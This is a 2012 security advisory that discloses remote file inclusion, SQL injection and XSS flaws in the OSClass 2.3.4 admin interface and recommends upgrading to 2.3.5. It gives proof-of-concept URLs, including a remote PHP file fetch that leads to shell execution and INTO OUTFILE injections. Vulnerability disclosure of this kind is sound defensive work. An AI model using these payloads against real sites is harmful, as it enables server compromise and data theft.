Advisory ID:CSA-12003
Title:Multiple vulnerabilities in OSClass
Product:OSClass
Version:2.3.4 and probably prior
Vendor:osclass.org
Vulnerability type:SQL injection, XSS, Remote file inclusion
Risk level:2 / 3
Credit:www.codseq.it
CVE:
Vendor notification:2012-01-12
Public disclosure:2012-01-27

Details

OSClass version 2.3.4 and probably below suffers from multiple vulnerabilities:


1) Remote file inclusion in osc_downloadFile(). This vuln allows an attacker to put an arbitrary file (ie a melicious php script) on the server under the www root so it's possible to execute shell commands with the previleges of the webserver
An attacker must be logged as admin to exploit this vulnerability.

http://127.0.0.1/osclass/oc-admin/index.php?page=ajax&action=upgrade&file=http://127.0.0.1/tmp.php


http://127.0.0.1/osclass/oc-content/downloads/tmp.php



2) SQL injection in admin's ajax interface when performing the "edit_category_post" action. The GET parameted id is not sanitized.
An attacker must be logged as admin to exploit this vulnerability; gpc_magic_quotes must be off

http://127.0.0.1/osclass/oc-admin/index.php?page=ajax&action=edit_category_post&en_US%23s_name=pi&en_US%23s_description=p&id=2122992'%20into%20outfile%20'/tmp/poc'%20--%201




3) SQL injection in admin's ajax interface when performing the "enable_category" action. The GET parameted id is not sanitized.
An attacker must be logged as admin to exploit this vulnerability.

http://127.0.0.1/osclass/oc-admin/index.php?page=ajax&action=enable_category&id=2)%20poc%20into%20outfile%20'/tmp/poc'%20--%201


(id must be a valid subcategory id - in this case gpc_magic_quotes can be on)



4) XSS in admin's' ajax interface. The GET parameted id is not sanitized.
An attacker must be logged as admin to exploit this vulnerability.

http://127.0.0.1/osclass/oc-admin/index.php?page=ajax&action=enable_category&id=2%3Ca%20onmouseover='alert(1)'%3E


(id must be a valid category id)

Solution

upgrade to OSClass 2.3.5

http://osclass.org/2012/01/16/osclass-2-3-5/